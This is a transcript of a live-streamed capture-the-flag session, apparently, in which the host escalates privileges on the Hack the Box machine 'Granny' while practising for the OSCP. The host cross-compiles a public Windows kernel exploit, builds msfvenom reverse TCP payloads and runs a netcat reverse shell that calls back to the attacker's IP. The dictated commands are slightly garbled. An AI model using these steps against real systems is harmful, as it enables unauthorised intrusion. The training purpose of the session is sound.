automated exploitation tools and automated post-exploitation tools in the OSCP. So I'm just kind of walking through some manual stuff. Now, in the OSCP, you'll have a Windows, they give you access to a Windows VM ready-made with a bunch of stuff already on it. And as you walk through the PWK, you have like Python.exe already configured and all this stuff. So you won't necessarily have to go through all this, though it's good to be prepared and it's good to already have all this stuff set up ahead of time. So it looks like that. It looks like Python went. So let's try and rerun the, however the hell you pronounce that. What is this? Nuitka? I don't know. You tell me. Where should you be installed? You should be in, I believe, Python 2.7, yeah? C Python 2.7, yep. All right. Now, if we go back to the tutorial that's on a completely other operating system. This thing was showing us so we need to download the Python code for Sky 18176. Oop. Should just be able to search by the number, I believe. Nope. Okay. Ah, damn CAPTCHA. I should have paid more attention to this. We're doing this guy, so AFDS or AFD.sys. It's gonna suck if this doesn't work anyways. We have to like do all this again for some other exploits. Hopefully it'll work. Since this is a relatively unpatched system, it should work pretty well. That's 11. When did 2008 or SP2 come out? Windows 2008. 2008, 2003. I'm going crazy here. SP2. What? Service Pack 2. 2007. Okay, so an 011 should work just fine. This is the Python? This is the Python. Cool. So if we... come on. Let's just Python version and then sample a PY. Nope. Nope. Where the hell did that thing get installed to? Did say that it got installed here, didn't it? Tools, maybe? Why? Why are you being a pain in the ass? Fuck. D-disk? No! Did I seriously do that? Come on. Oh, I totally did. Ah, damn it. I did. That's so dumb. Okay, let's fix this. There. That was dumb. Okay. All right, now the is that seriously all I need to do? Let's copy. Let's copy. Let's not copy that there. Let's do. Jesus, I cannot type. Okay. And you get no output. Seriously? Okay, that's a thing that happened. Thanks for all the output. Oop. Skip. I said skip, right? Thank you. Yeah, I know it's there. It's just like no output bothers me. There's all my CTF stuff. CTFs. Hack the box. We're doing Granny, right? Yeah. Okay. We got an EXE. This is going to be super dumb if this doesn't work. Oh no, my session died. So let's upload. Actually, we should just be able to upload one.exe. Yeah, nice. Let's cd temp upload one.exe. All right, let's watch this fail. I'm gonna be super sad. All that work, all that time. Show me the goods. See, we should be getting some sort of output, I believe. Oh wait. Wait, 176.exe, and it wants O2K. Fuck. 18176.exe O2K3. Bah, why? Yeah, it's doing something weird. Why do you hate me? That's such a pain in the ass. They weren't nice enough to leave Python on here, were they? No. Damn it. Okay, let's see. What about is there a C version of this? Let's see. What's it? AF. Whoa. No. The C version of this, there's C version of that. Yeah, turns out you have to go to destination. So C, like we can cross compile locally. Yeah, I'm trying another privesc. Katana says that we should try something else, and I agree. So with C, I can cross compile on my host machine and then just send it over. So we can, let's see, what does it say? Exploit prerequisites, low privilege access to target. Yep. Target not patched, correct? Service routing and remote access running on target. Can we see? Actually, can we even SC query? It stopped, so that won't work. So let's see what else we got. Keyboard event privilege escalation. Yeah. Wait. I'm looking at what IPsec says. IPsec says it's doing a Python OS system call, which I believe requires interactive session. Did I change that? No. May want to do like a net user to change the password or something. Not really sure what you're saying. So the OS system call, maybe that's a good point. Frankly, I think I'm just going to try a C, cross-compile the C, one of these C privesks. I just need to find one that I like. I believe this one should work. I think this is the one that I used when I was exploiting it before. Oh yeah, that absolutely will not work. But so IPsec says that it was OS system, and then it like pops up a new window with cmd exe tco/kcd. Yeah, so that wouldn't work, but also I wasn't getting any output from the thing. My guess is that none of the like whatever that pi to exe thing that I was using, I just don't know enough about it, so I was probably using it wrong. This should work though. Let's do this. Again, I believe this is the actual exploit that I used to privesk before. So let's copy exploit this to here, and then we're going to vi 3755. So let's see. here's the compile stuff. Prerequisites that we're low access, we are. Target not patched, which we're not. We'll cross compile this in a minute, but just kind of let's take a look at what's going on here. We're looking for the shellcode, basically. Actually, let's get out of VI. 37755. So we're going to look for the shellcode here. Okay. So that's not a lot of shellcode. And I wonder if we can get I'm a little concerned that like a reverse, some kind of reverse shell wouldn't fit, because I don't know what the shellcode is, so I don't really want to use the shellcode. My guess is that it's the shellcode is some kind of it's something similar to what the last one was. To IPSEC's point, the last, here, I'll just show. If we do, what was the pi vi 18, or let's just less it, 181 pi. So what it was doing is trying to pop this, right? So my guess is that the default shellcode in this 37755 my guess is this is doing the same thing here. Is probably doing something similar. It's just not a lot of bytes to be doing something. We might be able to put like a full reverse shell in here. Maybe, I don't know, maybe, the first stage of something at least. So let's do that. Let's do an Msfvenom, and we'll do a -L grep Windows. So this is just listing payloads and then grepping only the Windows payloads. And then we can figure out like kind of what we have access to, right? So we can this, I don't know if we've gone over this in my videos before, but this is something interesting to know as you're dealing with, Meterpreter or, various Metasploit payloads and payloads in general. So if you notice, there's some Meterpreter payloads that have Meterpreter _ something, and then we have other payloads that are Meterpreter / something. You'll notice with the / one, it says staged here. And what that means is the non-stage, the single stage payloads are basically the entire shell in one giant glob of shellcode. And that's fine for some reasons, but what it means is that you need a significant area in the exploit, in the vulnerable service, when you inject, when you overflow into, trying not to get too into the weeds here, but when you inject a ton of exploit code into a program, you need a lot of room in that program to be able to put an entire single stage payload into it. Not every buffer overflow has that much room in memory for you to do that, in the vulnerable part of memory for you to do that. So these multi-staged, or they call them staged payloads, are what they are is a smaller bit of shellcode that just has enough shellcode in it to reach back to the original to your host server, your attacker server, and then it'll say, "Give me more, give me the rest of the code," and then you can give it the rest of the Msfvenom shell. I'm hand gesturing here, but you can give it the rest of the Msfvenom shell with all of the extra functionality and inject that directly into memory without having to give it all of the bytes ahead of time, right? So think of a staged payload as just kind of this little bit of code that knows enough to say, hey, give me the rest of it, to connect back over the network and say, give me the rest of the functionality. So what we're going to do, because we're trying to mimic a smaller amount of shell code, we're going to look for a staged shell code here, or a staged payload here. And we don't want the x64. We're on a 32-bit system, I believe. Yeah, 32-bit system. So rather than doing, it shouldn't really matter. We can try Msfvenom. Let's try a staged Msfvenom first, just to give it a shot. 16. 1416. 1416 L port equals 8910. And then the format we're going to say it's C, because we want it to output in C format, so we can just stick it right in the C code. And then we don't need to redirect it to anything. Katana says, I really enjoy your videos. I'm really bad at hacking. That's okay, man. I am really bad at hacking too. That's the secret, I think, is that everybody is really bad at hacking. Nobody knows everything. I mean, you're looking at me struggle with this stuff, and this is stuff that I did on the OSCP. So don't worry about it. We're all bad at hacking. What I'm doing right now, actually, is this is quite a lot of bytes. I'm a little nervous that won't work. Unless you do a lot of investigation on the vulnerability itself and the vulnerable system itself, it's best to try and keep your shell code to a similar size as the initial exploit shell code, just to kind of improve your chances of success. So let's see if we can do this. Msfvenom p host equals 10, 10, 14, 16. 10, C. Oh god, that's like the same. In fact, it's like almost. Is it the same? Oh, because it's just the first stage of something. Duh. There's probably a little differences here and there. No, it's exactly the same. It's probably a few bytes different. Well, let's give it a shot. VI. Let's see. Move 3557 something right now. 377. Let's see. So this is our modified exploit, right? Oop. What? No. There we go. Oh my god. This is like 4 lines to like 15 lines. Yeah, that's so gross. one thing you'll want to do here is, or what I like to do, it might be required on the OSCP. If it's not, it's just a damn good habit. But if you jot down what you use to generate the payload, so we'll do Windows interpreter reverse TCP, and it's better to cut and paste this actually, but you can type it from memory if you know. What? // it's not Python comments. Python comments would be, oh, down there. I see. I did it right up above and didn't down here. I'm silly. Thank you for catching that, Agenda AAA. Thanks for the catch. Oh, God. All right, that should work. Anyways, so what I was saying, yeah, definitely set up. I guess I could have done the / here, but make a note to yourself, because when you're reusing the exploit later, you're like, wait, what shellcode is this? What IP address was it going to, etc. You want to know. Okay, so then we need to cross-compile it. So instead of using GCC, we're going to use a thing called it's like Ming. MingW is like the Linux compiler that can compile to Windows stuff. So we're gonna compile exploit .c to output. We're gonna call it exploit.exe. Okay, what's this saying? Previous declaration of NT status was here. Typedef long NT status versus typedef dword NT status. Okay, well, maybe we can just change dword to long. I don't see why not. We'll try it. Oop. Okay. It's saying it worked. Cool. Oh, wait. Okay, so we will upload exploit.exe. Oops. Oh. We need to go to temp. Now upload exploit.exe. Exploit.exe. Let's hope this works. I want to stop the stream. What is the deal? No, man, there's like output that's supposed to be happening here. Yeah, why not? Let's terminate it. Let's see. Oh. It's supposed to be, I believe there's like output that comes through this. Hold on. Well, this exploit should actually, let's see, if you look at it, or was it the other exploit I was looking at? Maybe it was the other exploit I was looking at. Oh, yeah. Yeah, you're right. It was the other one I was looking at. The other, no, well, yes. Okay, so two things. So agenda is the original shellcode. It modifies the original shellcode. So putting in our own won't work. What I was thinking of was this guy, and in this guy, it takes the shellcode. Where'd it go? Yeah, and in this guy, it like starts. It detects how long the shellcode is, and then adds stuff on top of it. But that's not what this one does. Didn't it already say NT authority? Yes, but not all NT authority is system. Demi-skeleton asked that. So if we get UID, of course this shell is dead. Probably dead. Yeah, I'm guessing it's dead. Why? Let me try to decompile the original code to see if it's working as the Python one. Check strings should be enough. Maybe try to decompile the original code to see if it's working as the Python one. Checking strings should be enough. Oh, like strings the 181. Oh my god. The hell is this? Disconnect. How do I disconnect from an interpreter without having it terminate? Like backgrounding an interpreter shell, you can either hit Control-Z to background a interpreter shell, or you can just type background and hit enter, I believe also works. I don't know what's going on here. To answer the earlier question about didn't it already say NT authority, it does, but see how it says NT authority network service? That's not NT authority system. NT system is the one we want, not network service. Network service is just another like unprivileged thing. So 686 7755C. Oh. Oh wait, let's. I'm nervous about this. This is where, if you understand C, you'll have a much easier time with this than I do. I'm not sure how much that changes, because dword and long basically reserve different amounts of space and memory. It shouldn't mess with anything, but maybe it does. I don't know. This is where we kind of get out of my understanding of things. So that compiled. Load. Okay. So here's the issue: is that it's that it spawns a shell, but we're not getting it, right? Now, if we go, hold on. Yeah, see, we don't actually get that shell. But if we PS, I think we can see the shell. Yeah, see, there's exploit exe running. I don't know. Exploit framework. We're going to go into modules, exploits, Windows, local, and we're looking at was it MS1407? Copy that here. Let's see what the actual Metasploit module is doing. Where? Katana, we could absolutely do that. The what we're trying to do with this box is not use Metasploit, not use automated exploitation and post modules, which are forbidden from in the OSCP exam. So I'm just trying to show the process for that. Also shows that, like, you know, hacking and exploitation are not, breezes that people just burn through. There's there's quite a bit of trial and error and experimentation and learning and understanding. So I think there's a lot of videos online of people just like blowing through CTF challenges and stuff, and it's good to see that because you see the the steps taken to exploit stuff. But sometimes, as frustrating it is for me, and as much as I think that I should just be able to show everyone how things work and it just work every time, I think it's important to see that people stumble on this stuff, and you have to kind of tweak things. So where is it injecting the payload? Oh, is it just here? So you've got this buffer, then you've got So I think this is what we need to change. Not the shellcode down below, but this thing here. What does /k do? Run command and then return. Wait. Run command and then return to the command prompt. This is useful for testing environment and examining variables. But it creates a child process. That's yeah, we don't have access to a normal user. We're in a okay. So sorry. The question is, but you have access, some access to the normal user on the system. Maybe try to log into the Windows server from your Windows VM to get access to UI. Then spawning CMD shouldn't be a problem. The issue is that we're not a normal user. We are just a service, like a network service. So there is So there is Lacus on here, but I don't have access to Lacus is the problem. If we were Lacus, then or if we did have, some sort of like login to Lacus, or if we could migrate to Lacus or something, you upload NC and then have it execute NC for another reverse shell. That's kind of what I was thinking, sudo man, is if we look at this here, yeah, so if we look at this here, this is trying to spawn another command shell. And rather than doing that, if we could just have it sort of like what man was saying, if we could have it, execute NC or something, that's probably the better way to go. So let's do something like that. So do we have, like, I feel like Kali should just have nc.exe. Oh, good. Yes, we do. That's useful. So if we're in ctemp, so upload user share Windows binaries nc.exe. And then if we do nc nlp, let's say 9090. So if we vi exploit dot c, oh, wait, we don't want to do that quite yet. And then here we're looking for CMD. So this we're going to, so Windows, temp, I'm going to NC, and let me remember the Windows NC, Windows syntax. I think it's similar, but I'm just trying to remember. Netcat for Windows. Oh, it's the same. It uses the dashes and everything. Okay, so we're gonna nc and we're gonna e cmd.exe. Oh, do I have to supply the full path? Wait, it says netcat for Windows, and then it gives us like bin bash. Oh. That's not useful. I think it's the same though. It's got to be the same, or at least very close. I just forget, do I have to include the full path? I probably have to do the full path, which means that okay, so we're gonna do C Windows temp nc.exe, execute that, and then we're going to do that to 10, 10, 14, 16 on port 9090. Let's see, temp nc.exe. Hopefully that'll work. I think that'll work. Let's test it. God, what was it? Oop. System32 cd.exe 10, 10, 14, 16, 90, 90. Hey, cool. Okay, so that does work. So we'll listen here. We're going to exit out of this shell. We're going to, let's see, we're going to i686 Windows 64 GCC exploit.c exploit.exe. I'm going to upload exploit.exe. Please work. I want to be done with this. Oh my god. It's being used by another process. Okay. Exploit2.exe. Should probably kill that eventually, but screw it. Upload exploit2.exe. Shell. Okay, now let's exploit2.exe. Oh my god, no. It just killed. It just died. Without okay, now we need to look at these flags. I don't know what these flags say. C create process when API create process. Can't pass arguments like that. Oh. You can't pass arguments like this? IPsec says you can't pass arguments like that. Yeah, that's the spot for the actual file. But in the previous, so he says that's the spot for the actual file, which I guess I'm getting to, but so system is trying to execute the entire thing, arguments included as a file. I see. This is command line. The second parameter should be command line. In, out, optional. Command line to be executed. At least that's your guess. So this is the command line. Module name C programs generally repeat the module name as the first token. Second guess is my NC is 64-bit. Oh, that's valid. File, was it user share Windows binaries? Yeah, nc.exe. No, it looks like a 32-bit to me. Okay. But that's also a good guess. My guess is that one of these flags is. Did you test NC without doing the privesc? I did test NC without doing the privesc. So let's. So if I set up my handler here, and I go into shell, I can do nc.exe e Windows System 32. Nope. Oh, come on. Oops. So nc.exe cy. What is happening here? nc.exe c Windows System 32 cmd.exe 10 10 14 16 90 90. Oh, wait. Forward host lookup failed. Oh. C Windows System 32 cmd.exe 10 10 14 16 90 90. So here's my, here's my shell coming from the NC. So NC is working. My guess is that it's something in this. I think the idea that it's in here is correct. I feel like, and this is again me just needing to figure this stuff out. I feel like it's probably one of these things rather than this being a problem, but we'll learn. Okay, so the IP command line is the second parameter. It says the command line to be executed. So I think this is right because it's the same way that it was used in, if we look at 37755, it's the same way it's used here with parameters and stuff. My guess, it's a bad guess. I mean, it's an uneducated guess, but my guess is that one of these nulls or trues or zeros is start up in the background or something like that, or something. I'm not sure. Actually, can we find a when apt Freudian slip there, create process nc.exe. Let's see if we can find an example of this. Oh. Is this gonna work? Oh my god, is this gonna work? I'm so excited for this to be over. I love hanging out with you people, but damn, this has drug on way too long. And we'll call it exploit 3 just to... Alright. Please get this to work. Upload exploit3.exe. Ah, damn it, come on. What is wrong with you? I mean, this isn't like a Linux thing, right? No. Force the DOS window to remain open. Oop. Okay, let's just take this whole thing. Okay, so this command line works. So either the privesc isn't working, wait a minute. Why was I able to exit out of that twice? Oh, damn it. No, true, 0, no. No, true, 0, no. Yep. No creation flag. Oh yeah, maybe K is the problem. Oop. Try C. Yeah, let's find out what C is. So IPsec said maybe the K is the problem. Try C instead. cmd.exe C. Just here's out a command specified and then terminates. Okay. So yeah, let's try C. That's a good idea. What does K do? But remains. Okay. We're gonna get this. Maybe. Someday. Split 4.exe. Still not getting anything. It's not getting back to us. It's not, I don't think it's running the command. I don't know if this exploit's actually firing. Like, I don't know if it's actually exploiting the box. Let's see. What can we do here? So, well, let's do this. Share Metasploit modules. Let's see, exploits, Windows, local. So for those of you playing along at home, if you noticed, once you get into this file structure, all of this is exactly the way it works inside of the Metasploit framework. So you can actually look at the scripts and the exploits and the payloads and everything on your file system to kind of see what's going on behind the curtain. It's also useful when, especially on the OSCP and similar things, to look at the Ruby code, rewrite it or adapt it into standalone Ruby or Python code, and then fire it off as a manual exploit, which is allowed inside the inside OSCP, or it was when I took it. I would double check the FAQ on that. But so we're looking for MS70. Oh. So I'm looking for the buffer. I want to see the actual code that's put in here. I also want to lesssploit.c for the same reason. I want to see if maybe the Metasploit module is sending something different. Okay. So we get 0, 4, a bunch of zeros, and then 2. How many zeros? 1, 2, 3, 4, 5, 6, 7. We got 1, 2, 3, 4, 5, 6, 7. Okay, then 2, 1, 2, 3 zeros, then 2, then 0, 0, then 2, 2. 1, 2, 3, 1, 2, 3, then 4. Then 1, 2, 3, 4, 5. It's 1, 2, 3, 4, 5, and then a 1. And then 1, 2, 3, 4, 5. 1, 2, 3, 4, 5. Okay. Prismatic says, one thing I love about this channel is we see your troubles and your way of troubleshooting. I feel it's important. I think so too. And by that I mean, this is totally on purpose, and I don't really suck at hacking. I absolutely suck at hacking. But yeah, it's, you know, I think it's an important part of the process. So, okay, so this buffer is the same. The shell code. So the shell code equals the token stealing shell code target nil nil false. Where is target? Oh, target would be okay. Oh, target's here. Okay, so target, since it's this, it would be OX. So it should be 38D89498. So 38D89498. So then target nil nil false. the stack frames looking for the syscall. Fortunately, I just don't know enough about how Metasploit crafts this stuff. Hold on one sec. For those of you who don't follow me on Twitter, my wife just had surgery the other day, so I'm just checking in with her, making sure she doesn't need anything. I was not planning on this stream going on as long as it has. Just need to make sure she doesn't need like a new drink or anything. She's not super mobile at the moment. Huh. Yeah, IPSec, that's a good idea. So IPSec says use the Metasploit just to make sure it's still exploitable. It's just really a good idea. Okay, it turns out she does need something. Let me, I'll try the exploit real quick, and then I'm gonna go AFK for a few minutes and go help her, and then I'll be back. So let's see. So we're gonna use exploit multi-handler, set payload, Windows, interpreter, reverse TCP, set host 0, set L port 8910, set exit on session false exploit J. Oh. No. Oh. Duh. Still actually, okay. Okay, we're going to search MS14070. Whoop. No, not, I'm sorry. Yes, search MS14070. Use this. Set session 6. We're going to set payload Windows interpreter reverse TCP set L host 10.0 set L port. Okay, so it's still working. Our exploit attempts are just bad because I am bad. Give me 5 to 10 minutes. I'm going to check on the wife. I will put up, obviously we don't have commercials here, but I'm put up my little break time graphic, and I'll be right back. All right, I'm back. Sorry about the interruption, folks. Let's, all right. I have the default password, yeah? Yeah, good. Okay. Oh my gosh, all the... Are people hitting my stuff, or is my ship beaconing out? I don't know what's happening here. Okay, so here's the deal. It is 9 o'clock my time. I have another half hour or so to get this working. If I don't get it within the next half hour or so, I don't know. I guess I'll do some work on it and try it again next, or do a follow-up, either blog post or follow it up with the next video or something like that. In the meantime, let's see what we can do about this. There's a couple things that I'm confused about. So the first thing is, I'm not sure if our change in the very beginning to get the thing to compile, where we changed from dword to long NT status, I can't imagine that would do anything, but don't believe I should change the create process command. Well, the problem is, if we don't change anything, it doesn't work. So Agenda AAA said that they don't. By the way, if it seems weird that I'm repeating all this, I've received many complaints on the VODs that I don't repeat the question, so I'm like half carrying on a conversation. They don't know what's going on, so I'm just kind of repeating everything that people say. So Agenda AAA says, I don't believe you should change the create process command. The problem is that I need to change something, because if we just do this by default, so we still have, so we have this guy here, this 355. We will default.exe. So we'll just compile this just to, I don't have any sessions. Okay, curl HP 10, 10, 10, 15. So 8, and we'll cd to temp, and we'll upload default.exe shell. So if we run default.exe, we basically have the exact same behavior as we see from everything else, which leads me to believe that either the buffer in the exploit is wrong, or the something in the exploit itself is wrong compared to what's in the Metasploit payload, or my changing of the dword to long had significantly changed, or changed something just slightly enough to make none of this work. Those are kind of the two ideas that I'm operating under right now. So it just hangs here for a while until it times out. See, if I do get UID, see, so that's not actually working. Exploit, okay, Agenda says exploit notes say it should work from a remote shell. I agree, which is why I'm wondering if it's the, I agree, it should be working here, which is why I'm kind of leaning towards the idea that the buffer is off somehow for this one. Like, I'd need to modify it in some way. Finally coded with like 686, maybe it's that thing. That's so, unfortunately, there is no 586 in the new version, and I can't seem to get the 586 compiler working. So that's the next question that I have. That's the next problem that I've got. So what we can do, so hi 586 you know, what's the, so if we VI, now saying all that, if that's the problem, because this is, when I started the Streamlate, this is kind of what I was working on. Yeah, so this guy goes into saying, well, you can just add an old repository to get it to download. Which, according to the Kali people, you're not ever supposed to do, but, you know, desperate times and all that. So the problem is that if there is no i586 in like the new version of Ming or something like that. I haven't been able to get it to install. So if we so we're gonna install the the W32 version instead of the W64, which is what's currently installed. And that should give us the i586. I'm going to go GCC. And we will do the exploit.c, output, you know, exploit, we call it order 66.exe. Exploit 66.exe. Man, if this works, I'm going to lose my shit. Metasploit doesn't compile. It's all done in Ruby, so it's all done in Ruby. So Agenda says the Metasploit compiles the code on the fly or has it pre-compiled. Maybe you can use the one from the framework, and that's kind of what we were doing right before I left. I got sidetracked a little bit by helping out my wife. So let me see if this works, and then if not, we'll go back to comparing the two. And this just fails. It's not even worth waiting. So if we back out of this, and then we back out of that, so we're gonna VI user. So what we're doing here, what I was doing here is comparing these. Okay, so agenda, so you can't, so even if you, maybe I'm skipping around because I tried to exploit.c. So I'm skipping around a little bit here. So what happened is in the original one, I changed this from dword to long. The problem is that the i586 isn't actually, so if we do this, it's going to complain because we don't have, like, we're still using these libraries for some reason. I'm not exactly sure why. So if we do like an apt search mingw, let's see. Actually, did we do an app search I586? Let's try this. And then also these. Those are already installed. Okay, so I586. CPP. Yeah, and see, it still complains because it's still using these libraries. Such a pain in the ass. Yeah, I don't know, man. Let's change that back. It's the only damn way it'll compile. It's compiling in Windows VM an option. I don't actually have a Windows VM. I could compile it just on my desktop. Or do I have a Windows VM? Probably do. I do have some Windows VMs. I don't have like .NET installed or anything like that. And frankly, I don't know. I don't think I've compiled anything in Windows since high school, but we can give it a shot. Why not? Oh my God. As you can tell, I turn these on a lot. No. Oh, come on. It's going to complain at me because probably like way out of the registration time too. Come on. Activate later, please. Yeah. I've been messing with this guy too. So just so everyone's aware, this is a trial version of Windows. You can download it from modern.ie. This is something that Microsoft actually provides for, like test beds and stuff. So I haven't, stolen anything. I'm not, pirating anything. I just can't be bothered to revert to snapshot right now. So we need to, oh yeah, thank you. cd, so mgr rearm. Sudo man is offered a tip. Mgr rearm. Sweet. I am not restarting this computer again. It can deal. Okay, so I need a C compiler for Windows. C compiler for Windows. I imagine it's going to be like, you need... Wait, can I actually just have this one? Because what I don't want to do is install like the whole like .NET Studio and all that shit. Also, I hate SourceForge. Look at all this crap. Man, I haven't seen the internet through the eyes of like not having an ad blocker in so long. The internet's a weird place without an ad blocker. MSVC, I don't know what MSVC is. Visual C++. Is it built into Windows or is it? I mean, you all are seeing like my not. Yeah, SourceForge used to be super cool. It's not anymore. Somebody said SourceForge used to be cool, like way back in the day. Y'all are seeing like my terrible Windows capabilities here. Compiler without Visual Studio. Okay, so evidently I can just download the C compiler without downloading the whole Visual Studio, which would be nice. Standalone C++ compiler. Well, hot damn. Oh no. Just the build tools though, right? What? Yeah. Yeah, crap. Crap indeed. This is what happens when you don't keep environments up to date. Hopefully this just doesn't boot us into a infinite rebooting loop. Oh yeah, I've totally, oh my god. What did I just install if I didn't? I love Windows, guys. I love it. Prismatic Legionary says this is why I don't touch Windows. I agree. I mean, the reality is that this is why I didn't touch Windows, like through the early part of my career, and as you can see, I'm suffering for it. Right? Like, it's important to deal with this stuff and know how this works and be able to work through everything. How I'm just looking at my stream health here, and then it's telling me that my audio bitrate is lower than it recommends. How's my audio for everybody? All right, good it is. I swear to God, Windows, if you tell me to reboot, I'm gonna lose my shit. Okay, let's go ahead and start downloading the. Oh my God, the. This is the best CAPTCHA. Prismatic Legionary says CAPTCHAs have taken over the internet. It's annoying. Has anybody seen the video of the robot like clicking on a touchscreen? I am not a robot. Because that would be amazing. Grep and wait, what? IPSEC says grep nc.exe test.c. What am I? What is test.c? What are we talking about here? Whoop. It worked for you. My exploit worked for you. Damn it. Really? Why doesn't it? So IPSec is saying that it worked for him, the exploit that I'm using. How? Changed dword to long, and then it just worked. IPSec, did you change? Were you using the nc.exe, or were you just the regular, just everything by default except changing dword to long? And what was your compile method? You pasted grep nc.exe test.c. Pios asked if I'll upload the videos to my channel. Yeah, all of my streams go up to my YouTube channel as well, unless you're asking IPSec that. Yes, the YouTube shopbox does suck. Just straight NC. vi exploit.c. So straight like what I'm showing right now, where it's the CU Windows temp, or you didn't even give the did you even give the path to it? Oh, give path. God damn it. No path to see. Oh, maybe that's the problem. 686 GCC. Let's see, out exploit. It's over 9,000. .exe. Oop. Oh, I don't have my freaking listener going. I still didn't have my freaking listener going. See, mine just closes. That's very confusing. Yours doesn't close, mine just closes. Oh, that's true. 0. It said that's progress. You got packets now, so. Wait, I'm sending the reset? Why the hell am I sending the reset? What? Oh, is it? It's because I don't have a. Okay. Let's try that again. Okay, so send synac ac, and it just says finac. I finac, then I finac again. It acts resets. Okay, what's the TCP dump filter for TCP dump full ASCII packets? Oh. I mean, that's a good idea. Net add user. How do you string is it like bash where I can just do like one command on top of the other? No, dude, literally just show me. There's a comment, blah, blah, blah. Oh, are you saying like IPsec is saying Msfvenom could create a binary so you don't have to call cmd.exe? So we could just like Msfvenom. Wait a minute. Can't we just... Well, okay, so two things. So Skunkofoot is saying or use Veil, but Veil is just gonna... I mean, Veil is really just making obfuscated, like... payload. So Veil's not really necessary here, though I should go into Veil in another. I should go into Veil in another video. In fact, I think I used Veil on one of the live Hack the Box boxes. So maybe when that retires, I'll use it. But to IPSEC's point, IPSEC says that Msfvenom could just create a binary so you don't have to call CMD. But if that's the case, can't I just have it, like, why don't I just upload totes legit to it? If we Msfvenom p Windows interpreter reverse TCP lhost equals 10, 10, 14, 16, lport equals 8, 9, 10, format is exe, totes legit.exe. And then in vi exploit.c, CTF HTTP Granny. Come on. Hey. Man, I don't know why we didn't think of this earlier. And there's system. Jesus Christ. We could have saved like 3 hours if that would have just worked the first time. Not 3 hours, but probably an hour and a half. So there's system. Let's do a quick recap since we went the long and windy road. We found this 3775.c. We found this privilege escalation for Windows 2003 SP2. Since the target box didn't have any patches on it, this exploit should work. We needed to modify a couple things because it wouldn't compile out of the box. First of all, we got an error because NT status was defined as a D word. So we just switched it over to a long to be the same as the other version of NT status from some library that we were importing. Once we did that, we had some problems, and we figured out that this call wasn't working for us. It worked, I guess it works on some systems. It didn't work for us, likely because of the remote shell that we were using. We eventually modified this to use netcat. We uploaded a netcat and then modified this to do a netcat reverse shell back to us. That didn't work for reasons. We couldn't figure out why. Evidently it worked for IPSEC, but not us. And that's where we were like an hour or so ago. Then IPSEC suggested that we, grab some other stuff, try another binary, and then I thought, well, if we're having, netcat just call some other binary, why don't we just call that other binary ourselves? So we made a new toteslegit.exe that was just a reverse interpreter shell, had this thing call it, and it called it as root. And here we are. And there we are, the NT authority system. So why do some of these exploits not compile? Do the authors just not test them, or are they just not as universal as we'd like? The short answer is they're not as universal as we'd like. C code in general is not very portable at all. We wish it was, but it isn't. So you need to compile in the right environment, using the right libraries. And sometimes it just doesn't work. The reality is that this exploit, I don't know why it wasn't working earlier. I don't know why the netcat version of our exploit wasn't working. Once we changed it to use the totes legit binary, it worked fine. It's likely due to some boneheaded mistake that I made, but the exploit seems to be working fine. So if it was, if it was a Linux one, I'd have a lot better answers for you because I know how Linux works a lot better, and I can compile things for Linux, and then you can run Python on Linux, and all of this other cool shit. But cross-compiling Windows binaries is something that I barely know how to do well enough to get the job done eventually. So hopefully this was educational for people, other than just an exercise in frustration. In the last box, the Granny box that we didn't do any auto exploitation. So, well, I guess we tested the exploit once just to make sure we didn't bork the box. But on the OSCP, you'd just reset the box instead of testing it like what we did. That was, I got a request previously for using less Metasploit, so this is my tip to that. So anyways, hopefully I'll have another stream up next weekend sometime. Until then, everybody have a very safe New Year's. I want to see you all alive and well on Monday or Tuesday. So until then, have fun.